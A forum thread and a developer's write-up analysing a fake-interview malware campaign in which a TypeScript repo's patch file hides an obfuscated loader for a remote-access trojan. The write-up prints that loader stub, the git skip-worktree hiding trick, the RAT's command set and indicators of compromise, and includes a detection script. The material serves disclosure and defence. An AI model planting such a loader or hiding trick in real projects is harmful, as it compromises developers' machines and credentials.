There are mitigations you can put in place by using containers, virtual machines or even the execution environment e.g. Deno's ability to block/whitelist network calls[0], Bun's --ignore-scripts [1] and supply chain package managers have made some strides here like pnpm [2]. But it's knowing your threat surface and how to use your tooling which can be quite overbearing on cognitive load, especially in fast paced scenarios like "job of a lifetime offer!" from LinkedIn.
Easiest way by default is to use ephemeral VMs / Sandbox Containers for such tasks which don't have mounted directories to your system etc. Or spin up a cheap EC2 / VPS to work on them in a short period of time.
[0] - https://deno.com/blog/deno-protects-npm-exploits and https://docs.deno.com/runtime/fundamentals/security/
[1] - https://bun.com/docs/pm/lifecycle
[2] - https://pnpm.io/supply-chain-security
Some details https://freebird.in/malicious-code-source-code-shared-via-jo...
I almost scheduled a call with them and even self-explained that of course they would be on Pacific time, it's where the money is.
I do have some npm packages under my name and they found me through github, so here is that.
https://en.wikipedia.org/wiki/Lazarus_Group
I've done incident responses for this exact type of attack multiple times. They've gotten much better organized lately and will often contact developers directly (over LinkedIn or WhatsApp) to run this type of attack. (Although, usually pretending to run a test for a job interview -- which is maybe why the author was confused about the code)
The C2 IP (89.124.107.161) and malware-serving git repo (144.124.244.92) are both hosted on VDSINA in Russia, so not sure if there's anything to do there.
https://www.tandfonline.com/doi/full/10.1080/2330443X.2022.2...
Hint: homicides and car theft. Burglary and larceny actually went down.
But, homicides surged prior to the start of the pandemic. If there is no correlation between the economic shutdown and homicides, then the crime surge was basically just car theft.
Car theft does not come from random homeless people. You don't steal a catalytic converter unless you know where you can sell it. You don't steal a car to make money, and then look around on where you can sell it. And, car theft, unless it is a car jacking, is free of violence. During COVID I think a lot of "nouveau criminals" came out of the woodwork, people that were probably barely surviving with legitimate jobs that disappeared during the shutdown. I saw an article where police jailed someone that was just a father and son, caught stealing multiple cars. Those men had no prior record and that seemed very strange to me.
I'm saying all this because this attack could be by Lazarus, as another commenter pointed out. Or, could it be someone using an LLM to create a similar attack by prompting "Make me a post-install attack that looks like something the Lazarus group would do." Could LLM create a new class of local criminals? It is trivial now to setup a website that looks like a legitimate AI business (because AI businesses all have to sound ridiculous to be taken seriously). Creating the assets to make this attack work can be done with a $20/mo Claude account and a local LLM for the dirty bits. It would leave a trail for sure, but I imagine someone that has worked on tracing those trails could come up with an imaginative way to hide just the right things.
I've experienced the "best economy in the history of the US" for the last several years. To me, it looks like we have been in a recession for years, that was before the AI boom. When a massive group of people face drastic and sudden unemployment, which is what it looks like to an aging tech worker like me, I bet at least some of them would consider this. The tech sector has lost more jobs in the last 6 months than in 2025. And, that group has zero North Korean nationals. It might be someone living in a suburb in Phoenix, Arizona that can't pay their mortgage anymore.
Who knows if this attack was seasoned professionals. But, when we talk about AI creating or destroying jobs, couldn't AI create a bunch of "jobs" which are stealing banking credentials on behalf of 55 year olds, no longer able to find jobs in the tech industry?
If nothing else, this feels like it would make a good contemporary sci-fi story.
This sort of an attack is comically simple to pull off with a 12b obliterated LLM model and some basic scripts and proxies.
Security has to evolve, or the world will be cooked by script kiddies running email loops.
There's really nothing sophisticated about this these days, and it's only a short matter of time before it becomes commonplace.
Anyone reading - if you're ever a victim, worth reporting to your national CERT and your org. The CERT can provide advice, it's useful for their threat intel, and your org can check their systems. You might not be the end target.
Disclosures
🧠 This post is fully human-written: all prose with the exception of the IoC information. Because it was time-sensitive, Claude was used to accelerate the RAT analysis and build an IoC-detection script.
As I live in Canada, this information was reported to the appropriate Canadian agencies (CCCS et al). The payload-laden image does not trigger any AV engines on VirusTotal.
The attacker’s identity is fictitious, but there are uninvolved people with the same name whom the persona could be confused with; that name has been omitted from this piece.
On Reddit there’s a few others in the Rust community who mentioned they were targeted as well.
This week I came into far-too-close contact with a fake-interview scam designed to backdoor my machine and, judging from the context of the emails, my packages on crates.io.
Note: I’m calling it the “PinpinRAT” because of some of the internal strings, but it’s possible this has another name out there. I couldn’t find any other references to it online.
A week and a half ago I received an email from “D█████ S████” claiming to be from Lua Ventures, a (unbeknownst to me at the time) defunct Singapore-based VC in the DeFi space. To be clear: this is a fabricated persona, and the name was likely chosen to be easily mistaken for one of a number of real people with the same name.
It looked like a real email, including a link to a somewhat boring, but legitimate-looking LinkedIn profile.
The attacker even name-dropped two of their investments that were specifically looking for advisory work: Lyrasing and Roadpay. Searching for either of the companies wasn’t really a flag - they both had some very basic web presence, but nothing that would indicate they were fake rather than just early stage. (archive.org snapshot of roadpay.cc).
We went back and forth on a meeting time and eventually settled on a time we were going to chat. There was nothing odd about the call itself, either. A somewhat-difficult-to-understand man with a German accent was on the other line. He said he was taking the call while travelling which was a bit odd, but again, not necessarily a flag.
After the call came the bait. A follow-up email that offered up a “test”.
At this point I was mildly annoyed, but not suspicious. I cloned the repo, but the first true red flag only fired here.
Where I got lucky: they sent me a TypeScript repo. It didn’t make sense to me. The instructions looked more like a TypeScript job interview than any sort of architecture analysis. I decided to zip up the repo and toss it into Claude to get a quick scan - a combination of caution and laziness.
A few moments later it had identified some oddities:
Notably, the root package.json has no postinstall/preinstall hook — interesting, because they use patch-package, which is normally wired to a postinstall. Let me check every package.json for lifecycle scripts, then audit the patch files (the real risk surface — patches can inject arbitrary code into node_modules).
That piqued my interest. I scanned the directories myself and noticed a fairly unreasonable number of patches/ directories. The first few I checked seemed innocent enough, but as you might have guessed, they were just trying to add noise so the real payload wouldn’t get caught.
packages/electron-benchmarks/patches/sumchecker+3.0.1.patch
packages/electron-benchmarks/patches/@electron+get+2.0.3.patch
packages/electron-benchmarks/patches/extract-zip+2.0.1.patch
While I was checking slowly by hand, Claude identified the first signs of PinpinRAT:
I found it. This is a malicious payload. Embedded in the typescript+5.9.2.patch file — inside what is presented as a routine “module specifier” patch to TypeScript — there is a base64-blob self-executing obfuscation stub injected at the very top of both _tsc.js and typescript.js:
;;(function(r,k){const d=Buffer.from(r,'base64');for(let i=0;i<d.length;i+=1)d[i]^=k;return new Function('require','Buffer','WebAssembly','process','__dirname',d.toString('utf8'))(require,Buffer,WebAssembly,process,__dirname)})("YWFg...",73)/*12ff4b51*/ void "ticket-harbor-tsc-shim-anchor";
This decodes a base64 string, XOR-decrypts every byte with the key 73, and runs the result through new Function(…) with require, process, Buffer, etc. handed in. That is a hidden code-execution payload that fires every time tsc or anything importing typescript.js runs — i.e. on the very first npm run typecheck / build / dev.
… and that’s the point where I decided to stop poking the bear on my own machine. I zipped it up with a password to stop myself from accidentally detonating it and kept running the analysis in the sandbox.
The repo is themed as a ferry-ticketing app named “Ticket Harbor”. The task.txt included in the bundle was a plausible set of boring tasks, but ended with:
Run the repo typecheck, test suite, and relevant desktop/server build commands before submitting.
That instruction is the trap that gets you.
The chain works like this:
Four separate postinstall hooks run patch-package. But one of them also runs git update-index --skip-worktree on the patch files, which hides them from git status.
The typescript+5.9.2.patch injects a self-executing stub at the top of typescript.js and _tsc.js. This is a lightly-obfuscated blob fed into new Function(...) (avoiding eval, presumably to avoid malware detection).
That loader reads a hidden chunk appended to a file named operators/3.png, runs a small embedded WASM stub (in a custom wAsm chunk), then spawns a detached, silent Node process carrying a 1.68 MB obfuscated second-stage payload.
It cleans up after itself at three layers: the git skip-worktree trick, the dropper rewrites the patch to delete its own injected lines after first run, and the stage-2 temp directory self-deletes on execution.
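The chain above is checkable before anything is installed or built, using only text you already have in the clone: the lifecycle scripts in each package.json, the added lines of each patch-package file, and the output of git ls-files -v (which prefixes skip-worktree entries with S). The following Node script is an added example, not code from the post or from the author's own IoC script; the sample package.json, patch and ls-files listing are constructed to mirror what the post describes, and the stub line inside the sample patch is the one quoted earlier on the page (with its truncated "YWFg..." blob).

```javascript
// Added triage helpers, not code from the original post: static checks for the
// three tricks in the chain above, run over text you already have before
// `npm install` or any build command. All sample inputs are constructed.

// 1. Lifecycle scripts. patch-package in postinstall is normal; a
//    `git update-index --skip-worktree` there is not, because it hides the
//    patch files from `git status`.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

function scanLifecycleScripts(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  const findings = [];
  for (const name of LIFECYCLE) {
    const cmd = scripts[name];
    if (!cmd) continue;
    if (/update-index\s+--skip-worktree/.test(cmd)) {
      findings.push({ script: name, reason: 'hides tracked files from git status (skip-worktree)' });
    }
    if (/patch-package/.test(cmd)) {
      findings.push({ script: name, reason: 'applies patches/ into node_modules; audit every .patch' });
    }
  }
  return findings;
}

// 2. Patch files. Only added lines (leading '+') can inject code. A stub that
//    base64-decodes, XOR-decodes and feeds the result to new Function has no
//    place in a "module specifier" patch, whatever the patch name says.
const STUB_PATTERNS = [
  [/new Function\s*\(/, 'new Function() builds code at load time'],
  [/Buffer\.from\([^)]*['"]base64['"]\)/, 'base64 blob decoded at load time'],
  [/\[\w+\]\s*\^=/, 'XOR decode loop over the decoded bytes'],
  [/WebAssembly/, 'WebAssembly passed into dynamically built code'],
];

function scanPatchText(patchText) {
  const findings = [];
  patchText.split('\n').forEach((line, idx) => {
    if (!line.startsWith('+') || line.startsWith('+++')) return; // skip the file header
    for (const [re, reason] of STUB_PATTERNS) {
      if (re.test(line)) findings.push({ line: idx + 1, reason });
    }
  });
  return findings;
}

// 3. Hidden tracked files. `git ls-files -v` prefixes skip-worktree entries
//    with 'S' and assume-unchanged entries with 'h'; both let the working copy
//    differ from what `git status` reports.
function hiddenTrackedFiles(lsFilesOutput) {
  return lsFilesOutput.split('\n').filter((l) => /^[Sh] /.test(l)).map((l) => l.slice(2));
}

// Combine the three checks into one verdict for a cloned repo.
function triageRepo(packageJsonText, patchTexts, lsFilesOutput) {
  const lifecycle = scanLifecycleScripts(packageJsonText);
  const patches = patchTexts.map((t) => scanPatchText(t));
  const hidden = hiddenTrackedFiles(lsFilesOutput);
  const suspicious = lifecycle.some((f) => /skip-worktree/.test(f.reason))
    || patches.some((p) => p.length >= 2) || hidden.length > 0;
  return { lifecycle, patches, hidden, suspicious };
}

// Constructed samples: a postinstall that runs patch-package and hides the
// patch, the stub quoted in the post inside a typescript patch, and a
// `git ls-files -v` listing with that patch marked skip-worktree.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'ticket-harbor-benchmarks',
  scripts: {
    postinstall: 'patch-package && git update-index --skip-worktree patches/typescript+5.9.2.patch',
    typecheck: 'tsc -p .',
  },
});

const SAMPLE_PATCH = [
  'diff --git a/node_modules/typescript/lib/_tsc.js b/node_modules/typescript/lib/_tsc.js',
  '--- a/node_modules/typescript/lib/_tsc.js',
  '+++ b/node_modules/typescript/lib/_tsc.js',
  '@@ -1,2 +1,3 @@',
  `+;;(function(r,k){const d=Buffer.from(r,'base64');for(let i=0;i<d.length;i+=1)d[i]^=k;return new Function('require','Buffer','WebAssembly','process','__dirname',d.toString('utf8'))(require,Buffer,WebAssembly,process,__dirname)})("YWFg...",73)/*12ff4b51*/ void "ticket-harbor-tsc-shim-anchor";`,
  ' "use strict";',
  '-var ts = require("./typescript");',
  '+var ts = require("./typescript.js");',
].join('\n');

const SAMPLE_LS_FILES = [
  'H package.json',
  'S patches/typescript+5.9.2.patch',
  'H patches/extract-zip+2.0.1.patch',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triageRepo(SAMPLE_PACKAGE_JSON, [SAMPLE_PATCH], SAMPLE_LS_FILES), null, 2));
}
```

Run it with node against the text of every package.json and patches/*.patch in a monorepo before typing any npm command; the skip-worktree check is the cheapest and the most telling, since there is no honest reason for an install hook to hide files from git.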
The actual payload is a RAT (a remote-access trojan). I was originally worried this was a credential stealer, but this is a lot worse. PinpinRAT is nested in three obfuscated layers which were a pain to unwrap: obfuscator.io (which claims LLM protection, hah), and two further base64 layers.
In the interest of 1) quickly sharing this info and 2) not accidentally detonating malware on my own machines, I let Claude tear apart the actual trojan in its sandbox and had it describe it to me.
To be absolutely clear: Claude was able to reverse engineer multiple levels of obfuscation over about 5 minutes of work, which is far faster than I could have.
The drop is a full remote-access trojan that seems to have been put together by someone who knows what they are doing. It sets up an RSA key locally and uses AES-256-CBC as a session key.
On startup it calls a checkin routine that harvests and exfiltrates a host fingerprint:
os.userInfo().username
process.argv
It generates an RSA-2048 keypair and a random AES-256 session key (aes_psk), then all subsequent traffic is AES-256-CBC encrypted with an HMAC-SHA256 integrity tag.
It supports the following commands:
env — JSON.stringify(process.env) dumped and sent back.
upload — reads an arbitrary file path and exfiltrates it.
download — writes attacker-supplied bytes to any writable path.
spawn — runs an arbitrary process with optional shell expansion.
ls / cd / pwd / cp / mv — general filesystem primitives.
dns — makes the host resolve arbitrary names through a specified resolver (for DNS tunneling?).
dismantle — self-removal.
If you ended up running one of these, you should immediately disconnect your system from the network and rotate your credentials from another machine. Remediation should be straightforward, but consider your credentials (including cookies and password-protected secrets) compromised.
These are some indicators of compromise found in the PinpinRAT malware:
PinpinWrappedJs
com.apple.WebKit.Networking
NODT_PAYLOAD_PATH, NODT_PAYLOAD_ARGS
WASMPACK (wAsm)
PINPIN_NO_AUTOSTART=1: stops persistence
mutex.js (only if the RAT had permission, may not exist on macOS)
typescript.js: 12ff4b51, ticket-harbor-tsc-shim-anchor
typescript+5.9.2.patch with the payload
~/Library/Caches/runtime-cache/.cache-<randomhex>/ (macOS), /tmp/.cache-<randomhex>/ (Linux), %TEMP%\.cache-<randomhex>\ (Windows)
payload.js and mutex.js
There’s a few places I should have seen flags earlier on. The goal of the campaign is to keep the flags subtle enough they don’t trigger your defences, but you need to be vigilant enough to see when enough yellow flags stack up to a red one.
The messages have some LLM tells to them when you look closer. That’s probably a sign that you should approach anything with extreme skepticism.
The LinkedIn profile looks real at first glance, but it’s filled with gibberish (“BSc(Hons), MA (Dist), PGDipFM, CEng”) that should at least trigger some word-salad vibes. No real activity.
The social media link on their website has a real history, but the name was changed in November 2025. The posts are all pretty vacuous, vague praise for companies that aren’t really described in any detail.
None of the companies that had websites had a real presence beyond their flashy websites.
They never sent a proper invite - it was just a time and a Google Meet. What VC doesn’t use a calendar? Their camera was off the whole time and they were “travelling”.
And the overall approach, a VC fund based in Singapore, operating out of CEST, reaching out to a developer in Canada, with domains targeting American customers but ending in .cc. It’s far more difficult to check credentials of an organization that’s so far away.
Nothing was obvious without hindsight, but the missing pieces are there if you look at the whole thing together.
It’s impossible to say for sure, but this was targeted, had a pretty convincing cover story with a fake persona, multiple fake websites with stolen history, and a patient timeline. The git trap was sophisticated. This “fake-interview scam” has been a theme for a number of actors in 2026.
Who is actually behind this is the responsibility of the agencies now. What is worth noting is that this was targeted at developers like you and me, and that I was lucky enough to see a red flag right before springing the trap.
And to be honest, what’s terrifying and sobering to me is that if this had been a Rust repository with a booby-trapped build.rs script, I might have even fallen for it.